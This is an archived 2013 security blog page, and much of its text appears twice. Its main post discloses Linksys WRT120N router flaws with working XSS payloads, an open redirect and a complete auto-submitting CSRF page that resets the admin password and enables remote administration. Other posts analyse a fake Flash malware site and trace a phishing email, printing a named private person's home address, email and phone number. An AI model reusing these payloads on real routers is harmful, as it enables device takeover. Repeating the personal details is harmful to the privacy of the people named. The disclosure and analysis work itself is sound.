Thursday, October 17, 2013
Sunday, September 15, 2013
Linksys WRT120N Multiple Vulnerabilities (XSS, Redirect, CSRF)
The following examples assume the device is located at 192.168.1.1. The attacks require authentication to the router or a CSRF attack against an authenticated user.
Firmware
v1.0.07 (Build 02) (Download)
Serial and PIN
The device serial number, PIN code, firmware, MAC, and other information can be found at https://192.168.1.1/Hidden_infoPage.stm
Open Redirect
Page: wait.stm
Param: redirect_url
https://192.168.1.1/wait.stm?redirect_url=http://www.google.com&delay_time=0
Reflected XSS
Page: traceroute.stm
Param: taddress
https://192.168.1.1/traceroute.stm?taddress=www.google.com'><script>alert(1);</script>
Persistent XSS
Page: Setup->Basic Setup
Param: host_name
Param: domain_name
URL - https://192.168.1.1/cgi-bin/apply.cgi
POST Data
host_name='><script>alert(1);</script>
&domain_name='><script>alert(1);</script>
&delay=0&opp=add&gateway1=&gateway2=&gateway3=&gateway4=&LangSel=0&change_lang=0&wan_type=0&curAtmIdx=3%27&dhcp_clt=1&mtu_type=0&lan_ip1=192&lan_ip2=168&lan_ip3=1&lan_ip4=1&lan_subnet_mask=0&lan_mask1=255&lan_mask2=255&lan_mask3=255&lan_mask4=0&dhcp_server=1&r_dhcp_server=1&start_ip4=100&num_addr=50&lease_m=1440&s_dns11=0&s_dns12=0&s_dns13=0&s_dns14=0&sdns1=0.0.0.0&s_dns21=0&s_dns22=0&s_dns23=0&s_dns24=0&sdns2=0.0.0.0&s_dns31=0&s_dns32=0&s_dns33=0&s_dns34=0&sdns3=0.0.0.0&wins1=0&wins2=0&wins3=0&wins4=0&time_zone=4+1&exec_cgis=SetBS&ret_url=%2Findex.stm%3Ftitle%3DSetup-Basic%2520Setup
Persistent XSS
Page: Setup->Advanced Routing
Param: router_name
URL - https://192.168.1.1/cgi-bin/apply.cgi
POST Data
router_name='><script>alert(1);</script>
&delay=0&op=add&NAT=1&nat_enable=1&RIP=0&set_num=0&sr_ip1=0&sr_ip2=0&sr_ip3=0&sr_ip4=0&sr_mask1=0&sr_mask2=0&sr_mask3=0&sr_mask4=0&sr_gw1=0&sr_gw2=0&sr_gw3=0&sr_gw4=0&routing_interface=0&exec_cgis=SetAR&ret_url=%2Findex.stm%3Ftitle%3DSetup-Advanced%2520Routing
Persistent XSS
Page: Wireless->Wireless Security
Param: sharedkey
URL - https://192.168.1.1/cgi-bin/apply.cgi
POST Data
sharedkey=</script><script>alert(1);//
&delay=0&sec_mode=psk1&enc_type=0&rds_ip1=0&rds_ip2=0&rds_ip3=0&rds_ip4=0&rds_port=1812&rds_secret=&group_key_second=3600&encryption_type=0&passPhrase=&generate=0&key1=&key2=&key3=&key4=&TX_Key=0&exec_cgis=WirWS&ret_url=%2Findex.stm%3Ftitle%3DWireless-Wireless%2520Security
Persistent XSS
Page: Applications & Gaming->Port Range Triggering
Param: name0 (All nameX fields are vulnerable)
URL - https://192.168.1.1/cgi-bin/apply.cgi
POST Data
name0="><script>alert(1);</script>
&delay=0&tport0_start=1&tport0_end=2&gport0_start=1&gport0_end=2&name1=&tport1_start=&tport1_end=&gport1_start=&gport1_end=&name2=&tport2_start=&tport2_end=&gport2_start=&gport2_end=&name3=&tport3_start=&tport3_end=&gport3_start=&gport3_end=&name4=&tport4_start=&tport4_end=&gport4_start=&gport4_end=&name5=&tport5_start=&tport5_end=&gport5_start=&gport5_end=&name6=&tport6_start=&tport6_end=&gport6_start=&gport6_end=&name7=&tport7_start=&tport7_end=&gport7_start=&gport7_end=&name8=&tport8_start=&tport8_end=&gport8_start=&gport8_end=&name9=&tport9_start=&tport9_end=&gport9_start=&gport9_end=&exec_cgis=AppPRT&ret_url=%2Findex.stm%3Ftitle%3DApplications%2520%2526%2520Gaming-Port%2520Range%2520Triggering
CSRF
Remote administration can be enabled and passwords can be changed via cross site request forgery. The following example page can be used.
OS Command Injection
Similar models (like the WRT110) suffer from blind command injection attacks in parameters on the Ping diagnostics page. While unverified, it's likely the WRT120N contains similar vulnerabilities. The router repeatedly power cycled while testing this, so your mileage may vary.
https://192.168.1.1/ping.stm?paddress=X&ping_size=X&ping_no=X&ping_int=X&ping_time=X
Timeline
Linksys support says that the 10 minute session timeout within the WRT120N will mitigate the attack, so no firmware update is to be released.
Firmware
v1.0.07 (Build 02) (Download)
Serial and PIN
The device serial number, PIN code, firmware, MAC, and other information can be found at https://192.168.1.1/Hidden_infoPage.stm
Open Redirect
Page: wait.stm
Param: redirect_url
https://192.168.1.1/wait.stm?redirect_url=http://www.google.com&delay_time=0
Reflected XSS
Page: traceroute.stm
Param: taddress
https://192.168.1.1/traceroute.stm?taddress=www.google.com'><script>alert(1);</script>
Persistent XSS
Page: Setup->Basic Setup
Param: host_name
Param: domain_name
URL - https://192.168.1.1/cgi-bin/apply.cgi
POST Data
host_name='><script>alert(1);</script>
&domain_name='><script>alert(1);</script>
&delay=0&opp=add&gateway1=&gateway2=&gateway3=&gateway4=&LangSel=0&change_lang=0&wan_type=0&curAtmIdx=3%27&dhcp_clt=1&mtu_type=0&lan_ip1=192&lan_ip2=168&lan_ip3=1&lan_ip4=1&lan_subnet_mask=0&lan_mask1=255&lan_mask2=255&lan_mask3=255&lan_mask4=0&dhcp_server=1&r_dhcp_server=1&start_ip4=100&num_addr=50&lease_m=1440&s_dns11=0&s_dns12=0&s_dns13=0&s_dns14=0&sdns1=0.0.0.0&s_dns21=0&s_dns22=0&s_dns23=0&s_dns24=0&sdns2=0.0.0.0&s_dns31=0&s_dns32=0&s_dns33=0&s_dns34=0&sdns3=0.0.0.0&wins1=0&wins2=0&wins3=0&wins4=0&time_zone=4+1&exec_cgis=SetBS&ret_url=%2Findex.stm%3Ftitle%3DSetup-Basic%2520Setup
Persistent XSS
Page: Setup->Advanced Routing
Param: router_name
URL - https://192.168.1.1/cgi-bin/apply.cgi
POST Data
router_name='><script>alert(1);</script>
&delay=0&op=add&NAT=1&nat_enable=1&RIP=0&set_num=0&sr_ip1=0&sr_ip2=0&sr_ip3=0&sr_ip4=0&sr_mask1=0&sr_mask2=0&sr_mask3=0&sr_mask4=0&sr_gw1=0&sr_gw2=0&sr_gw3=0&sr_gw4=0&routing_interface=0&exec_cgis=SetAR&ret_url=%2Findex.stm%3Ftitle%3DSetup-Advanced%2520Routing
Persistent XSS
Page: Wireless->Wireless Security
Param: sharedkey
URL - https://192.168.1.1/cgi-bin/apply.cgi
POST Data
sharedkey=</script><script>alert(1);//
&delay=0&sec_mode=psk1&enc_type=0&rds_ip1=0&rds_ip2=0&rds_ip3=0&rds_ip4=0&rds_port=1812&rds_secret=&group_key_second=3600&encryption_type=0&passPhrase=&generate=0&key1=&key2=&key3=&key4=&TX_Key=0&exec_cgis=WirWS&ret_url=%2Findex.stm%3Ftitle%3DWireless-Wireless%2520Security
Persistent XSS
Page: Applications & Gaming->Port Range Triggering
Param: name0 (All nameX fields are vulnerable)
URL - https://192.168.1.1/cgi-bin/apply.cgi
POST Data
name0="><script>alert(1);</script>
&delay=0&tport0_start=1&tport0_end=2&gport0_start=1&gport0_end=2&name1=&tport1_start=&tport1_end=&gport1_start=&gport1_end=&name2=&tport2_start=&tport2_end=&gport2_start=&gport2_end=&name3=&tport3_start=&tport3_end=&gport3_start=&gport3_end=&name4=&tport4_start=&tport4_end=&gport4_start=&gport4_end=&name5=&tport5_start=&tport5_end=&gport5_start=&gport5_end=&name6=&tport6_start=&tport6_end=&gport6_start=&gport6_end=&name7=&tport7_start=&tport7_end=&gport7_start=&gport7_end=&name8=&tport8_start=&tport8_end=&gport8_start=&gport8_end=&name9=&tport9_start=&tport9_end=&gport9_start=&gport9_end=&exec_cgis=AppPRT&ret_url=%2Findex.stm%3Ftitle%3DApplications%2520%2526%2520Gaming-Port%2520Range%2520Triggering
CSRF
Remote administration can be enabled and passwords can be changed via cross site request forgery. The following example page can be used.
<html>
<head><title>CSRF Test</title></head>
<body>
<form id="csrf" method="post"
action="https://192.168.1.1/cgi-bin/apply.cgi">
<!-- Change admin password to NewPassword --!>
<input type="hidden" name="change_pass" value="1" />
<input type="hidden" name="password" value="NewPassword" />
<input type="hidden" name="c_password" value="NewPassword" />
<input type="hidden" name="defPassword" value="admin" />
<!-- Enable remote administration via https port 6666 --!>
<input type="hidden" name="r_web_https" value="1" />
<input type="hidden" name="r_web_wleb" value="1" />
<input type="hidden" name="remote_adm" value="1" />
<input type="hidden" name="r_remote_adm" value="1" />
<input type="hidden" name="r_remote_proto" value="1" />
<input type="hidden" name="admin_port" value="6666" />
<!-- Other values expected by the script --!>
<input type="hidden" name="delay" value="0" />
<input type="hidden" name="beginip" value="0.0.0.0" />
<input type="hidden" name="endip" value="0.0.0.0" />
<input type="hidden" name="upnp" value="1" />
<input type="hidden" name="r_upnp" value="1" />
<input type="hidden" name="r_upnp_uset" value="1" />
<input type="hidden" name="r_upnp_dinetacc" value="0" />
<input type="hidden" name="wlan" value="1" />
<input type="hidden" name="reboot" value="0" />
<input type="hidden" name="exec_cgis" value="AdmM" />
<input type="hidden" name="ret_url"
value="%2Findex.stm%3Ftitle%3DAdministration-Management" />
</form>
<script>document.getElementById("csrf").submit()</script>
</body>
</html>
OS Command Injection
Similar models (like the WRT110) suffer from blind command injection attacks in parameters on the Ping diagnostics page. While unverified, it's likely the WRT120N contains similar vulnerabilities. The router repeatedly power cycled while testing this, so your mileage may vary.
https://192.168.1.1/ping.stm?paddress=X&ping_size=X&ping_no=X&ping_int=X&ping_time=X
Timeline
- 11 Apr 2013 - initial contact with support
- 12 Apr 2013 - ticket opened
- 17 Jul 2013 - asked for update
- 18 Jul 2013 - update, ticket still open
- 04 Sep 2013 - ticket closed
Linksys support says that the 10 minute session timeout within the WRT120N will mitigate the attack, so no firmware update is to be released.
Saturday, September 7, 2013
Cryptanalysis of David Spade
A recent cryptographic analysis of David Spade's numerology revealed a celebrity 0day: mathematical proof that David Spade is To Mega Therion, the Great Beast of Revelation.
DAVID = 4 1 22 9 4
SPADE = 19 16 1 4 5
4 + 1 + 22 + 9 + 4 = 40
19 + 16 + 1 + 4 + 5 = 45
2 names of 5 letters
10 letters total in name
40 / 10 = 4
45 / 10 = 4.5
4 * 4.5 = 18
18 = 6 * 3 = 6 + 6 + 6
SIX THREE TIMES! 666!
I haven't figured out how PGP figures into this yet, but I'm working on it.
DAVID = 4 1 22 9 4
SPADE = 19 16 1 4 5
4 + 1 + 22 + 9 + 4 = 40
19 + 16 + 1 + 4 + 5 = 45
2 names of 5 letters
10 letters total in name
40 / 10 = 4
45 / 10 = 4.5
4 * 4.5 = 18
18 = 6 * 3 = 6 + 6 + 6
SIX THREE TIMES! 666!
I haven't figured out how PGP figures into this yet, but I'm working on it.
Monday, March 4, 2013
Phisherman's Tales, Vol II
Being a fan of The Pirate Bay means enabling adblocks or endless battles with popups. update85.com is a frequent pop-under advertisement served on The Pirate Bay. It prompts the user to install a "pro" version of Flash that will make your whole life awesome. Also, considering there is no real pro version of flash, it will give your computer malware.
Update: the domain has since switched to update95.com.
Site Analysis
update85.com was purchased from Namecheap with WhoisGuard protection. Its server runs nginx and is currently located at 75.101.138.50 in the Amazon cloud. AWS and WhoisGuard is a pattern that's repeated with the other names and IPs as well. Take note, devs, even the bad guys are moving to the cloud.
The original pop-under URL:
The "af" parameter is an identifying hash that's later used as a unique name for the executable payload.
Somewhat ironically, the "al" parameter containing the warning message is vulnerable to XSS.
Analyzing the source for the landing page gives us some inline JS, links to various pages (such as software licensing terms), and the link to the dropper program. The source for these files can be downloaded here (scroll down, click grey 'download' button, and wait for the timer to finish).
The inline javascript injects two remote scripts:
1) New Relic analytics code, including rum.js used for page timing measurements. Their New Relic api-key is e981baeb5e and their appID is 2056962.
2) 46.51.162.142/giq.js, which passes tracking information to a remote PHP logger located at pixeltrk.info/log.php with the following GET parameters:
Uninstall, Contact, and Terms
The uninstall page simply tells you to remove Flash Player Pro from your Add & Remove Programs option in the control panel. It then gives the following disclaimer:
Finally, the contact information lists:
File Analysis
If you click through the BS, you're eventually rewarded with a download of Flash Player Pro, served on nicdls.com. It is located at 176.31.90.48 in Spain, runs nginx and PHP/5.4.7-1~dotdeb.0, and was registered using Whois Privacy Service from DonDominio.com.
You can download your own copy from the live site here or download my copy of the executable from here (click grey 'download' button and wait for the timer to finish).
The executable that gets sent is a windows exe dropper. The name of the file depends upon your unique hash from the af parameter mentioned earlier, and follows the format V.unique_hash.
Update: the domain has since switched to update95.com.
Site Analysis
update85.com was purchased from Namecheap with WhoisGuard protection. Its server runs nginx and is currently located at 75.101.138.50 in the Amazon cloud. AWS and WhoisGuard is a pattern that's repeated with the other names and IPs as well. Take note, devs, even the bad guys are moving to the cloud.
The original pop-under URL:
http://update85.com/flashplayer/pro4/indexd1.php?&_mcnc&af=04f021240deadbeef5cf746771e3d54d&of=gTPB-5-usa%20%20&p=y&al=WARNING!%20Your%20Flash%20Player%20may%20be%20out%20of%20date.%20Please%20update%20to%20continueThe URL contains parameters for analytics and tailoring the warning message that the page displays.
The "af" parameter is an identifying hash that's later used as a unique name for the executable payload.
Somewhat ironically, the "al" parameter containing the warning message is vulnerable to XSS.
update85.com/flashplayer/pro4/indexd1.php?al=WARNING!'); alert('xssIt's possible some of the other parameters, such as those logged for analytics, may be vulnerable to persistent XSS or SQLi as well.
Analyzing the source for the landing page gives us some inline JS, links to various pages (such as software licensing terms), and the link to the dropper program. The source for these files can be downloaded here (scroll down, click grey 'download' button, and wait for the timer to finish).
The inline javascript injects two remote scripts:
1) New Relic analytics code, including rum.js used for page timing measurements. Their New Relic api-key is e981baeb5e and their appID is 2056962.
2) 46.51.162.142/giq.js, which passes tracking information to a remote PHP logger located at pixeltrk.info/log.php with the following GET parameters:
'd' = document.location.hostnameIt also contains the following comment:
'r' = escape(document.referrer)
'l' = escape(window.navigator.language)
'u' = escape(window.navigator.userAgent)
'loc' = escape(document.location.href)
//beta versionb - live to be hosted on: d1cebafy1ctaaq.cloudfront.net/1pixeltrk.info resolves to 46.51.162.142 and is also an nginx, WhoisGuard'd AWS instance (located in the Ireland cloud).
Uninstall, Contact, and Terms
The uninstall page simply tells you to remove Flash Player Pro from your Add & Remove Programs option in the control panel. It then gives the following disclaimer:
Upon uninstall of the software certain data such as folders, files, registry keys, and cookies, may remain on your machine.The licensing terms page is an agreement between you and "Download4Free.org." It's the general cover-my-ass legal license.
Finally, the contact information lists:
info@download4free.org
1601 Main St. Suite 90-151
Willimantic, CT
06226The pages also say they were built using WYSIWYG Builder 8, so I lol'd. Download4Free.org is located at 184.168.221.42, registered with GoDaddy's Domains By Proxy, and is hosted at GoDaddy as well. It's an IIS 7.5 server running ASP.net 4.0.30319. It's had some other SEO domains hosted on it as well.
File Analysis
If you click through the BS, you're eventually rewarded with a download of Flash Player Pro, served on nicdls.com. It is located at 176.31.90.48 in Spain, runs nginx and PHP/5.4.7-1~dotdeb.0, and was registered using Whois Privacy Service from DonDominio.com.
You can download your own copy from the live site here or download my copy of the executable from here (click grey 'download' button and wait for the timer to finish).
The executable that gets sent is a windows exe dropper. The name of the file depends upon your unique hash from the af parameter mentioned earlier, and follows the format V.unique_hash.
ham@meat:~/code$ file spam/V.04f021240deadbeef5cf746771e3d54dI haven't busted out IDA or anything yet, but a quick look at the file's strings shows calls to registry edits and drops to a temp folder. Running it through Virustotal showed a detection ratio of 11/46, meaning 11 antivirus products found it to be malicious. Most AVs detected it as W32/DomaIQ.A. You can view its results for yourself here.
spam/V.04f021240deadbeef5cf746771e3d54d: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Tuesday, February 19, 2013
Phisherman's Tales, Vol I
On February 12th, an awesomely bad phishing email slammed head-long into my inbox. It was targeted at students and employees of my former university, so I decided to poke at it for giggles. The message and its headers:
Let's dig into some of the IPs from the headers. All of this information is freely available through domain and network registrations.
Next lets wget the contents of the page and see what was shakin' over there.
Let's checkout formmailhosting.com:
The address seems to jive with the registration information, but who's email was that? A quick google of "bfleming98@gmail.com" shows Bryan C. Fleming, owner of a slew of domain names. Fair enough.
But what about our mysterious Stanley Ling? Stan registered his domain to stanley.ling@gmail.com, located at 29 Jalan 18/26, Taman Sri Rampai, Setapak in Kuala Lumpur, Malaysia. Here's a map.
Searching the registration email that was used, "stanley.ling@gmail.com," gives us his profile at a marketing website, where he confirms the email address and uses the username "syling."
It's worth noting that periods are ommitable in gmail addresses, so we can also search for stanleyling@gmail.com. This gives us multiple SEO marketing sites. His cks-online.com domain now bounces to a suspended page for an affiliate marketing program.
A search for "stanley ling malaysia" brings us multiple hits for an actual Stanley Ling living in Setapak and using the name syling. He has multiple profiles confirming his address and interests in online marketing.
So, there you have it. Was Stan owned by a fellow affiliate marketer or was he the originator? Who knows, but I had fun anyway.
Return-path: <msu@mus.edu>Seems legit that the MSU helpdesk staff would send an email from "mus.edu" asking everyone to log into cks-online.com.
Envelope-to: XXXXXXXX@msu.edu
Delivery-date: Tue, 12 Feb 2013 10:33:42 -0500
Received: from [202.123.76.219] (helo=bsdmail2.tgtnet.com)
by ZZZZ.ZZZZ.msu.edu with esmtp (Exim 4.75 #3)
id 1U5HrM-0006V8-HV; Tue, 12 Feb 2013 10:33:30 -0500
Received: from tgtnet.com (localhost.localdomain [127.0.0.1])
by bsdmail2.tgtnet.com (8.14.2/8.14.2) with ESMTP id r1CF4Xrm096120;
Tue, 12 Feb 2013 23:04:33 +0800 (HKT)
(envelope-from msu@mus.edu)
From: "Michigan State University" <msu@mus.edu>
Subject: Warning!!!
Date: Tue, 12 Feb 2013 23:04:32 +0800
Message-Id: <20130212145850.M25036@mus.edu>
X-Mailer: OpenWebMail 2.52 20060502
X-OriginatingIP: 180.74.192.93 (terry.yue)
MIME-Version: 1.0
Content-Type: text/plain;
charset=iso-8859-1
To: undisclosed-recipients:;
Content-Transfer-Encoding: quoted-printable
X-MIME-Autoconverted: from 8bit to quoted-printable by bsdmail2.tgtnet.com id r1CF4Xrm096120
[Snip]
Subject: *****SPAM***** Warning!!!
Body:
Dear Subscriber's,
We have detected some unusual message from your account,to avoid you loosing
your account or suspension,you will have to re-confirm your account for us to
know that you are the right full owner of this email account.
You are therefore required to click or copy the link
http://cks-online.com/wp-mail.htm
to enable us verify and perform maintenance in your email account with our
new system upgrading software.Failure to provide your valid information, your
account will be suspended temporarily from our services.
We sincerely apologize for the inconvenience this might have caused you.
Helpdesk Team,
© 2013 Michigan State University
All rights reserved.
Michigan State University. Est. 1855. East Lansing, Michigan USA.
Let's dig into some of the IPs from the headers. All of this information is freely available through domain and network registrations.
202.123.76.219Huh. Mr. Seng Hoon Lee is gettin' busy. So, how about the phishing site, cks-online.com?
inetnum: 202.123.64.0 - 202.123.95.255
netname: HENDERSON
descr: Henderson Data Centre Limited
descr: 6/F, World-Wide House,Central
country: HK
person: Tech Admin
address: Henderson Data Centre Limited
address: 17/F WELL TECH CENTRE
address: 9 Pat Tat Street
address: San Po Kong
address: Kowloon
address: Hong Kong
country: HK
phone: +852-2908-6900
fax-no: +852-2908-6966
e-mail: tech.admin@ihenderson.com
180.74.192.93
inetnum: 180.72.0.0 - 180.75.255.255
netname: P1NETWORKS-MY
descr: Packet One Networks (M) S
dn
descr: Internet Service Provider
descr: Kuala Lumpur, Malaysia
country: MY
person: Seng Hoon Lee
nic-hdl: SL2018-AP
e-mail: senghoon.lee@packet-1.com
address: Level 4, PacketHub,
address: 59 Jalan Templer,
address: 46050 Petaling Jaya, Selangor,
address: Malaysia.
phone: +603-74508888
fax-no: +603-74508891
Queried whois.godaddy.com with "cks-online.com"...Oh Stanley Ling, you card! You can see the ~136 other phishing and SEO sites hosted on the same IP here.
Registered through: GoDaddy.com, LLC (http://www.godaddy.com)
Domain Name: CKS-ONLINE.COM
Created on: 28-Feb-09
Expires on: 28-Feb-13
Last Updated on: 25-Feb-12
Registrant:
Stanley Ling
29, Jalan 1826,
Taman Sri Rampai, Setapak,
Kuala Lumpur, WP 53300
Malaysia
Administrative Contact:
Ling, Stanley stanley.ling@gmail.com
29, Jalan 1826,
Taman Sri Rampai, Setapak,
Kuala Lumpur, WP 53300
Malaysia
+60.60126480288
Queried whois.arin.net with "n 97.79.238.221"...
NetRange: 97.76.0.0 - 97.79.255.255
CIDR: 97.76.0.0/14
OriginAS:
NetName: RCSW
NetHandle: NET-97-76-0-0-1
Parent: NET-97-0-0-0-0
NetType: Direct Allocation
RegDate: 2007-09-11
Updated: 2012-02-24
Ref: http://whois.arin.net/rest/net/NET-97-76-0-0-1
OrgName: Road Runner HoldCo LLC
OrgId: RCSW
Address: 13820 Sunrise Valley Drive
City: Herndon
StateProv: VA
PostalCode: 20171
Country: US
RegDate: 2001-09-07
Updated: 2011-07-06
Next lets wget the contents of the page and see what was shakin' over there.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN"Lame. Boxhost.me is a free web hosting service, and now we have a username: sycure. A search for it brings up an infosec blog: sycure.wordpress.com. In the interests of science, I used wget to mirror everything on sycure.boxhost.me, which you can download here. Stan made 3-4 versions of the same phishing site, apparently. There's not much worthwhile here, just shitty code. The robots.txt implies a wordpress install, but I didn't see one:
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><title>
Account Verification Page
</title></head>
<frameset rows="100%">
<frame src="http://sycure.boxhost.me/efe/Login.htm" />
<noframes>
<body>Please follow the <a href="http://sycure.boxhost.me/efe/Login.htm">link</a>.</body>
</noframes>
</frameset>
</html>
User-agent: *The phishing page forwards your credentials to a php script, presumably to send them off, and then bounces you to a thankyou.html page. The interesting part here was the analytics code at the bottom of the Thank You page:
Disallow: /wp-admin/
Disallow: /wp-includes/
<script type="text/javascript">Their analytics tracking number is listed near the end: UA-491816-39. Googling it brings us scrapes of a bunch of pages, the topmost of which is Formmailhosting.com, Youtubedriver.com, and Ricksgamblingguide.com. Formmailhosting is an affiliate marketing program (shocking), with a youtube page about affiliate marketing (also shocking).
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-491816-39");
pageTracker._trackPageview();
} catch(err) {}</script>
Let's checkout formmailhosting.com:
Registered through: GoDaddy.com, LLC (http://www.godaddy.com)Sherry's email seems a little odd: bfleming. A search for "sherry fleming michigan" brings us to the flash site of a web designer who apparently has worked on a Poker site. The address listed on the page is the same as the domain listed above.
Domain Name: FORMMAILHOSTING.COM
Created on: 17-Dec-08
Expires on: 17-Dec-13
Last Updated on: 18-Dec-12
Registrant:
Fleming Technologies
7156 Georgetown
Washington, Michigan 48095
United States
Administrative Contact:
Fleming, Sherry bfleming98@gmail.com
Fleming Technologies
7156 Georgetown
Washington, Michigan 48095
United States
(248) 974-6876
The address seems to jive with the registration information, but who's email was that? A quick google of "bfleming98@gmail.com" shows Bryan C. Fleming, owner of a slew of domain names. Fair enough.
But what about our mysterious Stanley Ling? Stan registered his domain to stanley.ling@gmail.com, located at 29 Jalan 18/26, Taman Sri Rampai, Setapak in Kuala Lumpur, Malaysia. Here's a map.
Searching the registration email that was used, "stanley.ling@gmail.com," gives us his profile at a marketing website, where he confirms the email address and uses the username "syling."
It's worth noting that periods are ommitable in gmail addresses, so we can also search for stanleyling@gmail.com. This gives us multiple SEO marketing sites. His cks-online.com domain now bounces to a suspended page for an affiliate marketing program.
A search for "stanley ling malaysia" brings us multiple hits for an actual Stanley Ling living in Setapak and using the name syling. He has multiple profiles confirming his address and interests in online marketing.
So, there you have it. Was Stan owned by a fellow affiliate marketer or was he the originator? Who knows, but I had fun anyway.
Subscribe to:
Posts (Atom)